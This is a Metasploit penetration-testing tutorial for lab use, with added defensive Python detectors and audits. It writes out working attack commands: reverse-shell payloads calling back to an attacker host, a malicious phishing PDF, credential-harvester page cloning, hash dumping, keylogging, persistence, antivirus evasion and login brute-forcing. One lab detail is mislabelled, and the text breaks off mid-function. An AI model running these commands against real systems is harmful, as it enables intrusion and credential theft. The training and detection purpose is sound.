Professional Tutorial on Metasploit Framework for Penetration Testing
Introduction
The Metasploit Framework is a powerful, open-source penetration testing platform developed by Rapid7, widely used by security professionals to identify, exploit, and validate vulnerabilities in systems, networks, and applications. With over 2,000 exploits, auxiliary modules, payloads, and post-exploitation tools, it automates complex attack workflows, making it a cornerstone of ethical hacking. This tutorial follows a structured roadmap to master Metasploit, covering fundamentals, installation, usage, and advanced techniques, with practical examples for each stage.
Aimed at intermediate pentesters, this guide assumes basic knowledge of networking, Linux, and cybersecurity concepts. All examples are designed for controlled lab environments (e.g., Metasploitable2, TryHackMe, Hack The Box) to ensure ethical and legal use. Unauthorized testing is illegal and unethical. Practice in safe environments and always obtain explicit permission before testing real systems.
1. Fundamentals Before Metasploit
Before diving into Metasploit, a solid foundation in networking, Linux, and cybersecurity is essential.
Networking Basics
- Concepts: Understand TCP/IP, UDP, ICMP, ports, and protocols (e.g., HTTP, FTP, SMB).
- Practical: Use Nmap to scan for open services:
    nmap -sV 192.168.1.10
  Output:
    21/tcp open  ftp   vsftpd 2.3.4
    80/tcp open  http  Apache httpd 2.2.8
  This identifies services exploitable by Metasploit.
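The Nmap output above is the first thing both sides read: the tester looks for exploitable services, the defender for the same versions to patch. As an added example (not part of the original tutorial), the Python script below parses Nmap -sV lines like these into a service inventory and checks each open service against a flagged-version baseline. The sample scan text and the FLAGGED_VERSIONS table are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the two lines from the scan above plus an SSH line,
# in Nmap's normal (-sV) output format. Not a real scan.
SAMPLE_NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
"""

# Hypothetical baseline of (product, version) pairs the blue team has already
# marked as end-of-life or affected by a known issue. Constructed for this
# example; in practice it comes from your vulnerability-management data.
FLAGGED_VERSIONS: Dict[Tuple[str, str], str] = {
    ("vsftpd", "2.3.4"): "vsftpd 2.3.4 (backdoored release, see section 16)",
    ("Apache httpd", "2.2.8"): "Apache 2.2 branch is end-of-life",
}

# One Nmap port line: "<port>/<proto> <state> <service> <version...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap_sv(text: str) -> List[Dict[str, str]]:
    """Return one record per port line; header, banner and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def split_product_version(version_field: str) -> Tuple[str, str]:
    """Split Nmap's VERSION column into (product, version).

    Nmap prints the product name, then the version token, then extra info,
    e.g. 'Apache httpd 2.2.8 ((Ubuntu) DAV/2)'. The first token that starts
    with a digit is taken as the version; everything before it is the product.
    """
    tokens = version_field.split()
    for i, tok in enumerate(tokens):
        if tok[0].isdigit():
            return " ".join(tokens[:i]), tok
    return version_field.strip(), ""


def flag_services(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Cross-check every open service against the flagged baseline."""
    findings = []
    for r in records:
        if r["state"] != "open":
            continue
        product, version = split_product_version(r["version"])
        reason = FLAGGED_VERSIONS.get((product, version))
        if reason:
            findings.append({"port": int(r["port"]), "proto": r["proto"],
                             "product": product, "version": version, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in flag_services(parse_nmap_sv(SAMPLE_NMAP_OUTPUT)):
        print(f"{f['port']}/{f['proto']}: {f['product']} {f['version']} -> {f['reason']}")
```

The product/version split is a heuristic: Nmap's VERSION column is free text, so anything more ambitious (CPE matching) should use `nmap -oX` and read the structured `<service product= version= cpe=>` attributes instead of the normal output.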
Linux Basics
- Concepts: Master file system navigation (cd, ls), permissions (chmod, chown), and processes (ps, kill).
- Practical: Make a script executable:
    chmod +x exploit.sh
  This prepares scripts for Metasploit automation.
Cybersecurity Basics
- Concepts: Learn attack vectors (e.g., buffer overflows, misconfigurations), exploits (code that triggers a vulnerability), and payloads (code executed post-exploit).
- Practical: Study CVE databases (e.g., https://cve.mitre.org) to understand vulnerabilities like MS08-067 (SMB flaw).
Visuals: For networking visuals, see TryHackMe’s “Network Fundamentals” room or Nmap’s official site (https://nmap.org).
2. Introduction to Metasploit
What is Metasploit?
Metasploit is a modular framework for developing, testing, and executing exploits. It includes:
- Exploits: Code targeting specific vulnerabilities.
- Payloads: Code delivered post-exploit (e.g., shells).
- Auxiliary Modules: Tools for scanning, fuzzing, or enumeration.
- Post-Exploitation: Modules for privilege escalation, persistence, etc.
Installation
- Kali Linux: Pre-installed.
- Ubuntu/Debian:
    sudo apt update
    sudo apt install metasploit-framework -y
- Verify:
    msfconsole -v
  Output: Metasploit Framework 6.x.x.
Starting Metasploit
Launch the console:
    msfconsole
Output:
           =[ metasploit v6.3.0-dev                          ]
    + -- --=[ 2300 exploits - 1200 auxiliary - 400 post       ]
    + -- --=[ 600 payloads - 45 encoders - 11 nops            ]
    msf6 >
The banner confirms Metasploit is ready.
Visuals: See Metasploit’s GitHub (https://github.com/rapid7/metasploit-framework) for console screenshots.
3. Metasploit Architecture
Components
- Exploits: Target vulnerabilities (e.g., exploit/windows/smb/ms08_067_netapi).
- Payloads: Deliver functionality (e.g., windows/meterpreter/reverse_tcp).
- Auxiliary Modules: Non-exploitative tasks (e.g., auxiliary/scanner/portscan/tcp).
- Encoders: Obfuscate payloads to evade antivirus.
- Post-Exploitation Modules: Manage compromised systems.
Example: An exploit (ms08_067_netapi) delivers a payload (reverse_tcp) to open a Meterpreter session.
Visuals: Rapid7’s documentation (https://docs.metasploit.com) shows module structure diagrams.
4. Information Gathering with Metasploit
Auxiliary Modules for Scanning
Use auxiliary modules to identify services, versions, or vulnerabilities.
Example: Scan for open ports:
    msf6 > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.10
    msf6 auxiliary(scanner/portscan/tcp) > run
Output:
    [+] 192.168.1.10:22 - TCP OPEN
    [+] 192.168.1.10:80 - TCP OPEN
This identifies potential attack surfaces.
Integration: Import Nmap results (the database commands need a connected database; run msfdb init first):
    msf6 > db_nmap -sV 192.168.1.10
    msf6 > services
Visuals: TryHackMe’s “Metasploit” room shows auxiliary module outputs.
5. Exploitation Basics
Finding Exploits
Search for relevant exploits:
    msf6 > search windows/smb
Example: MS08-067 SMB Vulnerability
Target a Windows XP SP3 machine (Metasploitable3):
- Load module:
    msf6 > use exploit/windows/smb/ms08_067_netapi
- Configure:
    msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.10
    msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.100
    msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
- Exploit:
    msf6 exploit(windows/smb/ms08_067_netapi) > exploit
Output:
    [*] Started reverse TCP handler on 192.168.1.100:4444
    [*] Meterpreter session 1 opened
This opens a Meterpreter session.
Visuals: Hack The Box’s “Legacy” machine walkthroughs show MS08-067 exploitation.
6. Payloads in Depth
Types of Payloads
- Inline: Single-stage, all code in one package.
- Staged: Multi-stage; a small initial stager connects first and fetches the rest of the payload.
- Reverse Shell: Connects back to the attacker (e.g., reverse_tcp).
- Bind Shell: Listens on the target (e.g., bind_tcp).
Example: Use a staged payload:
    msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
    msf6 > show options
This configures a Meterpreter reverse shell.
Visuals: Rapid7’s blog (https://www.rapid7.com/blog) has payload type diagrams.
7. Meterpreter Commands (Post-Exploitation)
Meterpreter is an advanced payload for post-exploitation.
Example Commands:
    meterpreter > sysinfo
Output:
    Computer : WINXP-VM
    OS       : Windows XP (5.1 Build 2600, Service Pack 3)
- hashdump: Dump password hashes.
- webcam_snap: Capture a webcam image.
- keyscan_start: Start the keylogger.
- upload /path/to/file: Upload files.
Practical: Dump hashes:
    meterpreter > hashdump
Output:
    Administrator:500:aad3b435b51404ee...:e52cac67419a9a224077...
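A hashdump line is pwdump format: username, RID, LM hash, NT hash, each field separated by colons. As an added example (not from the tutorial), the Python audit below parses such output and reports the credential-hygiene problems a defender acts on after a test: an LM hash still being stored (LM hashing enabled), a blank password (the NT hash of the empty string), and the built-in Administrator (RID 500) left under its default name. The sample dump is constructed; only the two well-known constants EMPTY_LM and EMPTY_NT are real values.

```python
import re
from typing import Dict, List

# Well-known constants: the LM field Windows stores when LM hashing is disabled
# (the "empty" LM hash), and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed hashdump output in pwdump format (user:RID:LM:NT:::). Every hash
# other than the two constants above is a placeholder, not a real credential.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text: str) -> List[Dict[str, str]]:
    """Parse pwdump-style lines; lines that do not match the format are ignored."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def audit_hashdump(text: str) -> Dict[str, List[str]]:
    """Return {username: [issues]} for every account with a hygiene problem.

    Checks: LM hash still stored, blank password, and the built-in
    Administrator account (RID 500) present under its default name.
    """
    issues_by_user: Dict[str, List[str]] = {}
    for e in parse_hashdump(text):
        issues = []
        if e["lm"].lower() != EMPTY_LM:
            issues.append("LM hash stored: LM hashing is still enabled on this host")
        if e["nt"].lower() == EMPTY_NT:
            issues.append("blank password")
        if e["rid"] == "500" and e["user"].lower() == "administrator":
            issues.append("built-in Administrator (RID 500) present under its default name")
        if issues:
            issues_by_user[e["user"]] = issues
    return issues_by_user


if __name__ == "__main__":
    for user, issues in audit_hashdump(SAMPLE_HASHDUMP).items():
        print(f"{user}: {'; '.join(issues)}")
```

The page's output is truncated with "..."; real hashdump lines carry the full 32-hex-digit fields the parser requires. NT hashes are unsalted and usable directly for pass-the-hash, so every account in such a dump needs a password change once the engagement report is in.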
Visuals: TryHackMe’s “Meterpreter” room shows session interactions.
8. Client-Side Exploitation
Client-side attacks target users via malicious files or web content.
Example: Generate a malicious PDF:
- Load module:
    msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
- Configure:
    msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set FILENAME malicious.pdf
    msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.100
    msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LPORT 4444
- Generate:
    msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
Output:
    [*] PDF file generated: /root/.msf4/local/malicious.pdf
Deliver via phishing and start a listener:
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LHOST 192.168.1.100
    msf6 exploit(multi/handler) > set LPORT 4444
    msf6 exploit(multi/handler) > exploit
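A PDF of the kind generated above carries an executable inside the document together with an action that launches it, which is exactly what mail-gateway and endpoint triage looks for. As an added example (not from the tutorial), the Python triage function below scans a PDF's raw bytes for those constructs (/EmbeddedFile, /Launch, /JavaScript, /OpenAction, /AA, and a stream that begins with the MZ executable header) and returns a weighted score. The two sample byte strings are constructed stand-ins with just enough PDF syntax to exercise the checks; they are not real documents.

```python
import re
from typing import Dict, List

# Constructed minimal PDF-like byte strings (not real documents, not malware).
SUSPICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /Names << /EmbeddedFiles 4 0 R >> "
    b"/OpenAction 5 0 R >> endobj\n"
    b"4 0 obj << /Names [(attachment.exe) 6 0 R] >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS (this.exportDataObject({cName: 'attachment.exe', nLaunch: 2});) >> endobj\n"
    b"6 0 obj << /Type /Filespec /F (attachment.exe) /EF << /F 7 0 R >> >> endobj\n"
    b"7 0 obj << /Type /EmbeddedFile /Length 4 >> stream\nMZ\x90\x00\nendstream endobj\n"
    b"%%EOF\n"
)
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

# PDF name objects that warrant a closer look, with a rough weight for each.
INDICATORS: Dict[bytes, tuple] = {
    b"/EmbeddedFile": ("embedded file stream", 3),
    b"/Launch": ("launch action (runs an external program)", 4),
    b"/JavaScript": ("JavaScript action", 2),
    b"/JS": ("JavaScript code", 2),
    b"/OpenAction": ("action runs when the document is opened", 2),
    b"/AA": ("additional (event-triggered) actions", 1),
}
# A stream whose first bytes are the DOS/PE magic "MZ": an embedded Windows executable.
PE_STREAM = re.compile(rb"stream\r?\nMZ")


def triage_pdf(data: bytes) -> Dict[str, object]:
    """Score a PDF's raw bytes for risky constructs; returns findings and a total score."""
    findings: List[Dict[str, object]] = []
    score = 0
    for name, (meaning, weight) in INDICATORS.items():
        # A name object ends at a delimiter. The lookahead keeps /EmbeddedFiles
        # (the name tree) from being counted as /EmbeddedFile (the stream type).
        hits = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data))
        if hits:
            findings.append({"indicator": name.decode(), "count": hits, "meaning": meaning})
            score += weight * hits
    pe_hits = len(PE_STREAM.findall(data))
    if pe_hits:
        findings.append({"indicator": "stream starts with MZ", "count": pe_hits,
                         "meaning": "embedded Windows executable"})
        score += 4 * pe_hits
    return {"score": score, "findings": findings}


def is_suspicious(data: bytes, threshold: int = 5) -> bool:
    """Triage verdict: anything at or above the threshold goes to a sandbox or analyst."""
    return triage_pdf(data)["score"] >= threshold


if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        result = triage_pdf(blob)
        print(label, result["score"], [f["indicator"] for f in result["findings"]])
```

This is a raw-byte triage, not a verdict: names inside compressed object streams (/ObjStm) or written with #xx hex escapes are invisible to it, so a production pipeline decompresses and normalizes with a real PDF parser before applying the same checks. Blocking executable attachments and disabling automatic actions in the reader closes the path this module relies on regardless of detection.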
Visuals: Medium articles (search “Metasploit client-side attacks”) show PDF generation.
9. Social Engineering Toolkit with Metasploit
The Social Engineering Toolkit (SET) integrates with Metasploit for phishing and credential harvesting.
Example: Clone a login page:
- Launch SET:
    setoolkit
- Select Social-Engineering Attacks > Website Attack Vectors > Credential Harvester > Site Cloner.
- Configure:
  - URL to clone: http://example.com/login.
  - Attacker IP: 192.168.1.100.
- Start Metasploit listener:
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set PAYLOAD generic/custom
    msf6 exploit(multi/handler) > set LHOST 192.168.1.100
    msf6 exploit(multi/handler) > exploit
- Capture credentials when victims log in.
Visuals: Hackers Arise (https://hackers-arise.com) has SET walkthroughs.
10. Privilege Escalation
Elevate privileges on a compromised system.
Example: Attempt SYSTEM access:
    meterpreter > getsystem
Output:
    ...got system via technique 1.
If unsuccessful, try:
    msf6 > use post/windows/escalate/getsystem_service
    msf6 post(windows/escalate/getsystem_service) > set SESSION 1
    msf6 post(windows/escalate/getsystem_service) > run
Visuals: TryHackMe’s “Privilege Escalation” room shows Meterpreter commands.
11. Post-Exploitation Modules
Manage compromised systems for persistence, credential harvesting, or lateral movement.
Example: Dump hashes:
    msf6 > use post/windows/gather/hashdump
    msf6 post(windows/gather/hashdump) > set SESSION 1
    msf6 post(windows/gather/hashdump) > run
Output:
    [+] Hashes dumped to /root/.msf4/loot/...
Persistence:
    msf6 > use exploit/windows/local/persistence
    msf6 exploit(windows/local/persistence) > set SESSION 1
    msf6 exploit(windows/local/persistence) > exploit
Visuals: Rapid7’s documentation shows post-exploitation outputs.
12. Metasploit for Web Application Testing
Target web vulnerabilities like SQL injection or file uploads.
Example: Scan for HTTP services:
    msf6 > use auxiliary/scanner/http/http_version
    msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.10
    msf6 auxiliary(scanner/http/http_version) > run
Output:
    [+] 192.168.1.10:80 - Apache/2.2.8
For WordPress:
    msf6 > use auxiliary/scanner/http/wordpress_scanner
    msf6 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 192.168.1.10
    msf6 auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /wordpress
    msf6 auxiliary(scanner/http/wordpress_scanner) > run
Output:
    [+] WordPress Version: 5.0.0
    [+] Plugins: reflex-gallery (vulnerable)
Visuals: Web Security Academy (https://portswigger.net/web-security) shows WordPress module outputs.
13. Custom Exploit Development
Write or modify exploits in Ruby.
Example: Create a custom auxiliary module:
- Navigate to /usr/share/metasploit-framework/modules/auxiliary/scanner/custom/.
- Create my_scanner.rb:
    require 'msf/core'

    class MetasploitModule < Msf::Auxiliary
      # Provides RHOSTS/RPORT handling plus send_request_raw, target_uri and normalize_uri.
      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name'        => 'Custom HTTP Scanner',
            'Description' => 'A simple HTTP version scanner',
            'Author'      => 'Your Name',
            'License'     => MSF_LICENSE
          )
        )
        # RHOSTS and RPORT are already registered by the HttpClient mixin;
        # register only what this module adds, here the path to request.
        register_options([
          OptString.new('TARGETURI', [true, 'Path to request', '/'])
        ])
      end

      def run
        res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) })
        if res
          print_good("Server: #{res.headers['Server']}")
        else
          print_error('No response from target')
        end
      end
    end
- Load (run reload_all first if the module does not appear in the module list):
    msf6 > use auxiliary/scanner/custom/my_scanner
Visuals: Metasploit’s GitHub has module templates.
14. Automation with Resource Scripts
Automate tasks with .rc files.
Example: Create scan.rc:
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 192.168.1.10
    run
Run:
    msfconsole -r scan.rc
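A resource script runs against whatever RHOSTS it contains, so the Scope Limiting tip from Best Practices applies before msfconsole -r is ever typed. As an added example (not from the tutorial), the Python pre-flight check below parses set/setg RHOSTS lines (single IP, CIDR, and Metasploit's a-b range syntax, including the short 192.168.1.40-45 form) and reports any entry outside the authorized scope; hostnames and file: references are flagged for manual review rather than resolved. The scan.rc contents and the AUTHORIZED_SCOPE network are constructed for this example.

```python
import ipaddress
import shlex
from typing import List, Sequence, Tuple

# Constructed resource script: the page's scan.rc plus three extra RHOSTS
# lines that exercise the checks. Not from any real engagement.
SAMPLE_RC = """\
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.10
run
set RHOSTS 10.0.0.0/8
set RHOSTS 192.168.1.20-192.168.1.30 192.168.1.40-45
setg RHOSTS target.lab
"""

# Authorized scope for the engagement (constructed).
AUTHORIZED_SCOPE = [ipaddress.ip_network("192.168.1.0/24")]


def expand_rhosts(token: str) -> List[ipaddress.IPv4Network]:
    """Expand one RHOSTS token (single IP, CIDR, or a-b range) into networks.

    Metasploit also accepts hostnames and file: references; those raise
    ValueError here so the caller can route them to manual review.
    """
    if "-" in token:
        start_s, end_s = token.split("-", 1)
        if "." not in end_s:  # short form 192.168.1.40-45: reuse the first three octets
            end_s = start_s.rsplit(".", 1)[0] + "." + end_s
        start, end = ipaddress.ip_address(start_s), ipaddress.ip_address(end_s)
        return list(ipaddress.summarize_address_range(start, end))
    return [ipaddress.ip_network(token, strict=False)]


def in_scope(net, scope: Sequence) -> bool:
    """True when net lies entirely inside one authorized network."""
    return any(net.version == s.version and net.subnet_of(s) for s in scope)


def check_rc(text: str, scope: Sequence) -> List[Tuple[int, str, str]]:
    """Return (line number, token, problem) for every RHOSTS entry that fails the check."""
    problems = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = shlex.split(raw, comments=True)
        if len(parts) < 3 or parts[0].lower() not in ("set", "setg") or parts[1].upper() != "RHOSTS":
            continue
        for token in parts[2:]:  # RHOSTS may hold several space-separated entries
            try:
                nets = expand_rhosts(token)
            except ValueError:
                problems.append((lineno, token, "not an IP/CIDR/range; resolve and review manually"))
                continue
            if not all(in_scope(n, scope) for n in nets):
                problems.append((lineno, token, "outside authorized scope"))
    return problems


if __name__ == "__main__":
    for lineno, token, problem in check_rc(SAMPLE_RC, AUTHORIZED_SCOPE):
        print(f"scan.rc:{lineno}: {token}: {problem}")
```

Run it over every .rc file before the engagement and fail the run on any output. The check is deliberately strict about hostnames: a name that resolves to an in-scope address today can point elsewhere tomorrow, so those entries belong in the scope document as addresses.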
Visuals: Rapid7’s blog shows .rc file examples.
15. Integrating Metasploit with Other Tools
Nmap
Import Nmap results:
    msf6 > db_nmap -sV 192.168.1.10
    msf6 > services
Nessus/OpenVAS
Import scan results:
    msf6 > db_import nessus.xml
Armitage
GUI for Metasploit:
    armitage
Visuals: TryHackMe’s “Armitage” room shows GUI interfaces.
16. Real-Life Scenarios & Labs
Practice on vulnerable machines:
- Metasploitable2: Includes exploitable services (e.g., vsftpd, Samba).
- DVWA: Web app for SQL injection, XSS.
- Windows XP SP3: Test MS08-067.
Example: Attack Metasploitable2’s vsftpd:
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.10
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Visuals: Hack The Box’s “Metasploitable” walkthroughs.
17. Advanced Usage
Evasion Techniques
Use encoders to bypass antivirus:
    msf6 > use encoder/x86/shikata_ga_nai
MSFvenom
Generate standalone payloads:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
Start listener:
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LHOST 192.168.1.100
    msf6 exploit(multi/handler) > set LPORT 4444
    msf6 exploit(multi/handler) > exploit
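From the network, the reverse_tcp session that connects to the handler above is a long-lived TCP connection on a port Zeek cannot attach a service name to, which is the signal a blue team hunts for regardless of how the executable was encoded. As an added example (not from the tutorial), the Python detector below reads Zeek conn.log-style records and flags connections from internal hosts that combine at least two of: the default handler port 4444, an unrecognized protocol on a port outside an expected-ports allowlist, and a duration over five minutes. The records and the EXPECTED_PORTS allowlist are constructed.

```python
import ipaddress
from typing import Dict, List

# Constructed records in the order of Zeek's first eleven conn.log columns:
# ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes
# The middle record is what a reverse_tcp session to a handler on
# 192.168.1.100:4444 looks like on the wire: long-lived, unusual port,
# protocol Zeek could not identify ("-").
SAMPLE_CONN_LOG = """\
1757153701.000000\tCabc1\t192.168.1.10\t49152\t93.184.216.34\t443\ttcp\tssl\t2.350000\t1420\t8890
1757153702.000000\tCabc2\t192.168.1.10\t49153\t192.168.1.100\t4444\ttcp\t-\t1843.200000\t9210\t1194304
1757153703.000000\tCabc3\t192.168.1.10\t53002\t192.168.1.1\t53\tudp\tdns\t0.012000\t60\t120
"""

FIELDS = ["ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p",
          "proto", "service", "duration", "orig_bytes", "resp_bytes"]
# Constructed allowlist of server ports this hypothetical workstation VLAN is expected to reach.
EXPECTED_PORTS = {22, 25, 53, 80, 123, 443, 445, 587, 993}
DEFAULT_HANDLER_PORT = 4444   # the LPORT used by msfvenom and multi/handler above
LONG_LIVED_SECONDS = 300.0


def parse_conn_log(text: str) -> List[Dict[str, str]]:
    """Parse tab-separated conn records; Zeek's '#' header lines and blanks are skipped."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) >= len(FIELDS):
            rows.append(dict(zip(FIELDS, parts)))
    return rows


def _num(value: str) -> float:
    """Zeek writes '-' for unset numeric fields."""
    return 0.0 if value == "-" else float(value)


def find_callback_candidates(text: str) -> List[Dict[str, object]]:
    """Flag TCP connections from private hosts that look like an interactive callback channel."""
    findings = []
    for r in parse_conn_log(text):
        if r["proto"] != "tcp" or not ipaddress.ip_address(r["orig_h"]).is_private:
            continue
        port = int(r["resp_p"])
        duration = _num(r["duration"])
        reasons = []
        if port == DEFAULT_HANDLER_PORT:
            reasons.append("default Metasploit handler port")
        if port not in EXPECTED_PORTS and r["service"] == "-":
            reasons.append("unrecognized protocol on a non-allowlisted port")
        if duration > LONG_LIVED_SECONDS:
            reasons.append(f"long-lived session ({duration:.0f}s)")
        # One weak signal is noise; two or more together are worth a ticket.
        if len(reasons) >= 2:
            findings.append({"uid": r["uid"], "src": r["orig_h"],
                             "dst": f"{r['resp_h']}:{port}", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_callback_candidates(SAMPLE_CONN_LOG):
        print(f"{f['uid']} {f['src']} -> {f['dst']}: {', '.join(f['reasons'])}")
```

Note that the flagged destination is itself an internal address (the lab attacker host), so the rule does not assume command-and-control is external; a pivot inside the network produces the same record. Changing LPORT removes only the first reason, which is why the duration and unknown-service signals carry the detection.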
Visuals: Black Hat Ethical Hacking (https://www.blackhatethicalhacking.com) shows msfvenom outputs.
18. Practice & Certification
- CTFs: Hack The Box, TryHackMe, VulnHub.
- Labs: OSCP (Offensive Security Certified Professional) labs.
- Resources:
  - Exploit-DB (https://www.exploit-db.com)
  - Rapid7 Blog (https://www.rapid7.com/blog)
  - Web Security Academy (https://portswigger.net/web-security)
Best Practices and Tips
- Ethics and Legality: Obtain explicit permission; test only in labs or authorized environments.
- Database Usage: Always initialize msfdb for workspace management.
- Scope Limiting: Set RHOSTS and TARGETURI carefully.
- Evasion: Use proxies (set Proxies http:127.0.0.1:8080) with Burp Suite.
- Integration: Combine with WPScan, Nikto, or sqlmap for web testing (see previous tutorials).
- Common Pitfalls:
  - Ensure payloads match the target OS/architecture.
  - Test exploits in VMs to avoid production risks.
- Resources:
  - Official Docs: https://docs.metasploit.com
  - GitHub: https://github.com/rapid7/metasploit-framework
  - TryHackMe: “Metasploit” and “Web Scanning” rooms
  - Hack The Box: “Legacy” and “Metasploitable” machines
Practical Example: Testing a WordPress Site
This example tests a WordPress site on Metasploitable3 (192.168.1.10) with the Reflex Gallery plugin (CVE-2015-4133).
Step 1: Reconnaissance
- Scan for WordPress details:
    msf6 > use auxiliary/scanner/http/wordpress_scanner
    msf6 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 192.168.1.10
    msf6 auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /wordpress
    msf6 auxiliary(scanner/http/wordpress_scanner) > run
  Output:
    [+] WordPress Version: 5.0.0
    [+] Plugins: reflex-gallery (vulnerable), akismet
Step 2: Brute-Force Credentials
- Enumerate users:
    msf6 > use auxiliary/scanner/http/wordpress_login_enum
    msf6 auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.1.10
    msf6 auxiliary(scanner/http/wordpress_login_enum) > set TARGETURI /wordpress
    msf6 auxiliary(scanner/http/wordpress_login_enum) > set USER_FILE /usr/share/wordlists/rockyou.txt
    msf6 auxiliary(scanner/http/wordpress_login_enum) > set PASS_FILE /usr/share/wordlists/rockyou.txt
    msf6 auxiliary(scanner/http/wordpress_login_enum) > run
  Output:
    [+] Valid Login: admin:password123
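Step 2 leaves a distinctive trail on the web server: a burst of POSTs to wp-login.php from one client, each answered with HTTP 200 because WordPress re-renders the form on a failed login, while a successful login is answered with a 302 redirect to wp-admin. As an added example (not from the tutorial), the Python detector below applies a sliding window over Apache combined-format access logs, flags any client with ten or more login POSTs within sixty seconds, and records whether that client also received a 302, which separates a failed spray from a guessed password. The log lines are constructed with documentation-range IPs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, Iterator, List, Tuple

# Apache combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")  # both endpoints accept credentials


def _line(ip: str, second: int, method: str, path: str, status: int) -> str:
    """Build one constructed log line (fixed date, varying second)."""
    return (f'{ip} - - [06/Sep/2025:10:15:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


# Constructed access log: 12 failed login POSTs in 33 seconds from one client
# and a single successful login (302) followed by a wp-admin page view from another.
SAMPLE_ACCESS_LOG = (
    [_line("203.0.113.5", s, "POST", "/wordpress/wp-login.php", 200) for s in range(0, 36, 3)]
    + [_line("198.51.100.7", 20, "POST", "/wordpress/wp-login.php", 302),
       _line("198.51.100.7", 21, "GET", "/wordpress/wp-admin/", 200)]
)


def parse_access_log(lines: Iterable[str]) -> Iterator[Tuple[str, datetime, str, str, int]]:
    """Yield (ip, timestamp, method, path-without-query, status); unparseable lines are skipped."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])


def detect_login_bursts(lines: Iterable[str], threshold: int = 10,
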